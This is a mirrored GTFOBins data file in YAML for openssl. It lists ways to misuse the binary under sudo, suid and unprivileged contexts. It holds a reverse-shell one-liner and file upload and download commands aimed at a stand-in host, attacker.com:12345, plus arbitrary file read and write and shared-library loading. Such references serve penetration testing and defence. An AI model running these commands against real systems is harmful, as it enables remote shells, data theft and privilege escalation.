mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 06:31:33 +01:00
560c37b5ff
The TTY annotation was missing in the rendered content for plain shell. Moreover now the shell function has TTY defaulting to true, whereas reverse-shell and bind-shell have it defaulting to false.
58 lines
1.2 KiB
Plaintext
58 lines
1.2 KiB
Plaintext
---
|
|
functions:
|
|
download:
|
|
- code: |-
|
|
openssl s_client -quiet -connect attacker.com:12345 >/path/to/output-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
sender: tls-server
|
|
file-read:
|
|
- code: |-
|
|
openssl enc -in /path/to/input-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
file-write:
|
|
- code: |-
|
|
echo DATA | openssl enc -out /path/to/output-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
- code: |-
|
|
openssl enc -in /path/to/input-file -out /path/to/output-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
library-load:
|
|
- code: |-
|
|
openssl req -engine ./lib.so
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
reverse-shell:
|
|
- code: |-
|
|
mkfifo /path/to/temp-socket
|
|
/bin/sh -i </path/to/temp-socket 2>&1 | openssl s_client -quiet -connect attacker.com:12345 >/path/to/temp-socket
|
|
comment: |-
|
|
The shell process is not spawn by `openssl`.
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
listener: tls-server
|
|
upload:
|
|
- code: |-
|
|
openssl s_client -quiet -connect attacker.com:12345 </path/to/input-file
|
|
contexts:
|
|
sudo:
|
|
suid:
|
|
unprivileged:
|
|
receiver: tls-server
|
|
...
|